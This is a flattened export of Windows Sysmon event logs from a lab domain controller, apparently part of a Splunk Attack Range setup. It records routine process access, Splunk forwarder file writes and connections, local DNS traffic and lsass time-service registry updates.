14:05:03.522{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202680Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:03.522{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202679Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:03.522{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202678Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:03.522{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202677Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:03.522{5ABCFE62-842D-603E-0500-00000000AD01}416432C:\Windows\system32\csrss.exe{5ABCFE62-E90F-6040-2E4E-00000000AD01}6828C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002202676Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:03.522{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E90F-6040-2E4E-00000000AD01}6828C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002202675Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:03.523{5ABCFE62-E90F-6040-2E4E-00000000AD01}6828C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002202674Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:03.319{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5C72F5C0FA982E94FC33A64FA5E0E24,SHA256=722E9EC2FA22371D00E3D296100FF15B7C99A86CEB381FC2BA22EEB2037F577D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202673Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:03.319{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=973EB17840CF2ED289CFD2B7A4177726,SHA256=7FCF041923D78FFE9660B7F6DBA8D3DA2C224810676F5112542EB488C9A1BB74,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002202685Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:04.616{5ABCFE62-842F-603E-0D00-00000000AD01}9124764C:\Windows\system32\svchost.exe{5ABCFE62-842F-603E-0F00-00000000AD01}296C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002202684Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:04.538{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A42C87D141990775C3AD0E2AC7766967,SHA256=22F6A23EDAB6207538BF0475AE84CA90BDDD1F2BEA14E9DDC121DD3D169EDC5C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202683Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:04.319{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3499B9574FACCFAD660F3511B9596A92,SHA256=B916C4D068C6B0FB0BFEABB3DB85071D966E66CCACCBD01D442C878F9C02239C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202687Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:05.335{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=804F42C0BEBBF4A076F76C6106A8DA04,SHA256=1CDB7FDC447B85B647FA4C82DCE10AEBB7CA8FC5217B3E3B4102F192C6B11851,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202686Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:01.093{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60659-false10.0.1.12-8000- 23542300x80000000000000002202689Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:06.913{5ABCFE62-84A2-603E-A500-00000000AD01}2876NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=78FFC68B55788172C6F01776E1175A4A,SHA256=7EFF8D2B790A6CE455B9D8C44CE8A2AF78181139506EC2EC15800E71AC1D548F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202688Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:06.350{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E63776B0DDFE6415C3AFC092C0C5F88A,SHA256=3372619FF7B1DE2CAAF523013DD267FF7D24DCC36D7D8F24B491B480E0D2154F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202691Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:07.975{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E90599A9384FE29CC20072DF61595D8A,SHA256=8454A7A022E27CD42638EE58BD598FC547EDBDAC434F001D6200FAD6DEC0A4ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202690Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:07.366{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8384ED8F164FF996D5A9271FD88D8847,SHA256=644915AA01A7775525489B533F687BD0DBE770EF546EF2DB2FBF2DFF9B7B2B28,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202693Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:08.382{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2335633E8D226B7E11613BA1E390D254,SHA256=D858D551A5D19814DB9D31098F72DC4AF48B456C6E8EDBDA0617AE51140F25B3,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202692Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:04.733{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60660-false10.0.1.12-8089- 23542300x80000000000000002202696Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:09.960{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=403FBA207C0EED6BB8294D85487A9316,SHA256=FD6BCD7B3A105D76F94D0A1DD0D6505F677430CE8470BEFE4DE9C1476C0F2785,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202695Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:09.397{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=159D667DD8FFDE1C0B3E3C003902671F,SHA256=9919A3A1E4599513EFB3FDD31B49046EFD406A2755C074046053BD56B93C2717,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202694Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:05.764{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local62773- 23542300x80000000000000002202698Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:10.413{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4C66BE0FBF4B70BD77B2755432882E8,SHA256=D90F7DE4D09F84306D2537917AEDC59B7DD4CC290A8D3006D67664832C9DFB15,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202697Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:06.780{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-62773- 23542300x80000000000000002202700Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:11.428{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2E4C99D64109E0D9AD2E3648CC3EFD0,SHA256=A19229F46E247ABB3EB041F4679AF1C6CFE25F76408DF31ED5F8CF47C672CF05,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202699Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:06.921{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60661-false10.0.1.12-8000- 23542300x80000000000000002202701Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:12.444{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18495768FFCE674B91E6674EDD01188A,SHA256=B8C724C6116D3D99D37DA6A47723D2215E09B78D4223AB5B9DAFCF9E0D204895,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000002202713Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:05:13.710{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x80000000000000002202712Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:05:13.710{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x095a5e11) 13241300x80000000000000002202711Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:05:13.710{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d710f7-0x035acffc) 13241300x80000000000000002202710Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:05:13.710{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d710ff-0x651f37fc) 13241300x80000000000000002202709Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:05:13.710{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d71107-0xc6e39ffc) 13241300x80000000000000002202708Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:05:13.710{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x80000000000000002202707Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:05:13.710{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x095a5e11) 13241300x80000000000000002202706Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:05:13.710{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d710f7-0x035acffc) 13241300x80000000000000002202705Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:05:13.710{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d710ff-0x651f37fc) 13241300x80000000000000002202704Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:05:13.710{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d71107-0xc6e39ffc) 23542300x80000000000000002202703Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:13.460{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD2FC6A64BDDBC1DF1220B64084C512E,SHA256=1E6A4ECA8B349C8238876A38418C60F2A6B8A6E3ADF15C6EB1C47555F2305333,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202702Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:13.194{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0439017D6B64D0D7A201ABFC67B8E21D,SHA256=C93B6D79915A77FECC888DC2FE75E8F7A222C6AAE760F48DF2CC8B1C5B570890,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202714Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:14.475{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1DE403B586F3D27B3132A100426B370,SHA256=523E0C6089C16C8CC9452D018E1300CF37E7E11B04D6EB732F6117468BEC9436,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202717Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:15.491{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BDF4865FC69FF6493813C81552675D9F,SHA256=9DD02CEDEDCB3A1CCF740C915AA33F523F3E19B4B65A36B618C27765906D639B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202716Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:11.952{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60662-false10.0.1.12-8000- 23542300x80000000000000002202715Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:15.132{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BA0AD2DD5F0940D74687F97EB7F6DB22,SHA256=7FAC452711504F196EF061487AB8E23B4B88CE20FE4961525941B5970647B5C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202719Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:16.975{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0C29618B1864BB633A55E434F6C9F72D,SHA256=B076B528952CB27677FE2269E4041AC597B4E5D67155B246531C5C3E79781DFF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202718Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:16.491{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1003E8483FC74AAEC19F5B4F392494FD,SHA256=8D94796587286AC750BD14FF8C4A490C31EA3A55C1E0D8C5C3933E9381B678C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202728Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:17.507{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FAE73E7E7ABAA84C535214984CCDDE95,SHA256=5D766201A6126E67851E0E898CEBB7C490DD85E6F8C0F27EC6E86B7E53A29852,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002202727Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:17.444{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E91D-6040-2F4E-00000000AD01}4160C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202726Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:05:17.444{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 